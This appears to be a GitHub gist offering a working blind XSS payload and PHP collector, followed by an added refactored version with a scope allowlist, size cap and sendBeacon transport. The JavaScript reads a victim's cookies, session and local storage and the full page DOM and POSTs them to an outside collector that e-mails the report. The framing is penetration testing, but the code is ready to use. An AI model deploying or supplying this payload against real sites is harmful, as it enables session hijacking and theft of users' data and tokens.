@insi2304
Created December 31, 2019 09:01
Blind XSS reporter: a JavaScript payload that, once it executes in a victim's browser, collects the user agent, page URL, referrer, readable cookies, Web Storage and the rendered DOM, and POSTs them to a PHP endpoint that e-mails the report to the tester.
// Blind XSS payload. The PHP echo resolves to a protocol-relative URL of the script this
// payload was requested from, so the report is POSTed back to that same endpoint.
var mailer = '<?php echo "//" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] ?>';
// Collect everything the script can read from the victim's browsing context.
var msg = 'USER AGENT\n' + navigator.userAgent + '\n\nTARGET URL\n' + document.URL;
msg += '\n\nREFERRER URL\n' + document.referrer + '\n\nREADABLE COOKIES\n' + document.cookie; // HttpOnly cookies are not exposed here
msg += '\n\nSESSION STORAGE\n' + JSON.stringify(sessionStorage) + '\n\nLOCAL STORAGE\n' + JSON.stringify(localStorage);
msg += '\n\nFULL DOCUMENT\n' + document.documentElement.innerHTML; // rendered DOM, including any CSRF tokens or data the page holds
// Cross-origin POST as a form-encoded "simple" request: no CORS preflight, so the browser
// sends it even though the payload is not allowed to read the response.
var r = new XMLHttpRequest();
r.open('POST', mailer, true);
r.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
r.send('origin=' + encodeURIComponent(document.location.origin) + '&msg=' + encodeURIComponent(msg));
<?php
// Collector: receives the payload's POST and e-mails the report.
// $origin comes from the victim's browser (or from anyone who finds this endpoint), so strip
// CR/LF before it is reflected into a response header and used in the mail Subject.
$origin = isset($_POST["origin"]) ? preg_replace('/[\r\n]/', '', $_POST["origin"]) : '';
// Reflect the page origin so the browser accepts the cross-origin response; the form-encoded
// POST is delivered even without this, it only affects whether the response is readable.
header("Access-Control-Allow-Origin: " . $origin);
$to = "yourpersonalemailid"; // replace with the address that should receive reports
$subject = "Blind XSS Report for " . $origin;
// X-Forwarded-For is only present behind a proxy; default to empty instead of a notice.
$ip = "Requester: " . $_SERVER["REMOTE_ADDR"] . "\nForwarded For: " . ($_SERVER["HTTP_X_FORWARDED_FOR"] ?? '');
$report = $_POST["msg"] ?? '';
$msg = $subject . "\n\nIP ADDRESS\n" . $ip . "\n\n" . $report;
$headers = "From: blindxssreport@vpsdomain" . "\r\n"; // use a sender on the VPS's own domain
// Only mail when a report was actually posted; a plain GET of this script sends nothing.
if ($origin && $report) {
    mail($to, $subject, $msg, $headers);
}
?>
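Two things a practitioner usually adds to a payload like the one above, shown here as an added example that is not part of the gist: a scope check, because blind XSS payloads routinely fire in places the tester never injected them (internal tools, third-party log viewers, other customers' tenants), and a size cap, because posting the whole DOM of a large page can exceed the collector's request limit (PHP's default post_max_size is 8M) or the mail size. The report logic is written as a pure function of a context object so it runs in Node for testing; in a browser you would call it with location.hostname, location.origin, navigator.userAgent, document.URL, document.referrer, document.cookie, sessionStorage, localStorage and document.documentElement.innerHTML. The character budget, allowlist and collector URL are constructed assumptions.

```javascript
// Added example, not the gist's own code. Assumption: 256 KiB of DOM is enough to triage a hit
// while keeping the form body comfortably inside typical server limits.
const MAX_HTML_CHARS = 256 * 1024;

// Scope check: report only from an allowed host or one of its subdomains.
// "example.com.evil.net" must not match "example.com", so compare with a dot-suffix.
function inScope(hostname, allowedHosts) {
  const h = String(hostname || '').toLowerCase();
  return allowedHosts.some(a => {
    const allowed = a.toLowerCase();
    return h === allowed || h.endsWith('.' + allowed);
  });
}

// Truncate a string to the budget and record how much was dropped so the report says so.
function capLength(s, max) {
  const str = String(s == null ? '' : s);
  if (str.length <= max) return str;
  return str.slice(0, max) + '\n[...truncated ' + (str.length - max) + ' characters]';
}

// Same fields as the gist's payload, built from an injected context object.
function buildReport(ctx) {
  const dump = st => {
    try { return JSON.stringify(st); } catch (e) { return '[unavailable: ' + e + ']'; }
  };
  return 'USER AGENT\n' + ctx.userAgent +
    '\n\nTARGET URL\n' + ctx.url +
    '\n\nREFERRER URL\n' + ctx.referrer +
    '\n\nREADABLE COOKIES\n' + ctx.cookie +
    '\n\nSESSION STORAGE\n' + dump(ctx.session) +
    '\n\nLOCAL STORAGE\n' + dump(ctx.local) +
    '\n\nFULL DOCUMENT\n' + capLength(ctx.html, MAX_HTML_CHARS);
}

// application/x-www-form-urlencoded body, so the PHP side still sees $_POST["origin"] / $_POST["msg"].
function encodeForm(fields) {
  return Object.keys(fields)
    .map(k => encodeURIComponent(k) + '=' + encodeURIComponent(fields[k]))
    .join('&');
}

// Browser transport (hypothetical helper, unused under Node). sendBeacon is delivered even if
// the page navigates away right after the injection fires; the Blob type keeps the request a
// CORS "simple" request, exactly like the XHR in the gist.
function browserSend(url, body) {
  if (typeof navigator !== 'undefined' && navigator.sendBeacon) {
    navigator.sendBeacon(url, new Blob([body], { type: 'application/x-www-form-urlencoded' }));
    return;
  }
  const r = new XMLHttpRequest();
  r.open('POST', url, true);
  r.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
  r.send(body);
}

// Returns true when a report was sent, false when the host was out of scope.
// `send(url, body)` is the transport; pass browserSend in a browser, a recorder in tests.
function report(ctx, collectorUrl, allowedHosts, send) {
  if (!inScope(ctx.hostname, allowedHosts)) return false;
  const body = encodeForm({ origin: ctx.origin, msg: buildReport(ctx) });
  send(collectorUrl, body);
  return true;
}
```

In a browser the call would be `report({ hostname: location.hostname, origin: location.origin, userAgent: navigator.userAgent, url: document.URL, referrer: document.referrer, cookie: document.cookie, session: sessionStorage, local: localStorage, html: document.documentElement.innerHTML }, '//your-vps/collector.php', ['target.example'], browserSend)`, with the collector URL and allowlist filled in for the engagement. Cookies and storage in the resulting mail are live credentials of a real user, so the collector's mailbox deserves the same handling as the rest of the engagement's evidence.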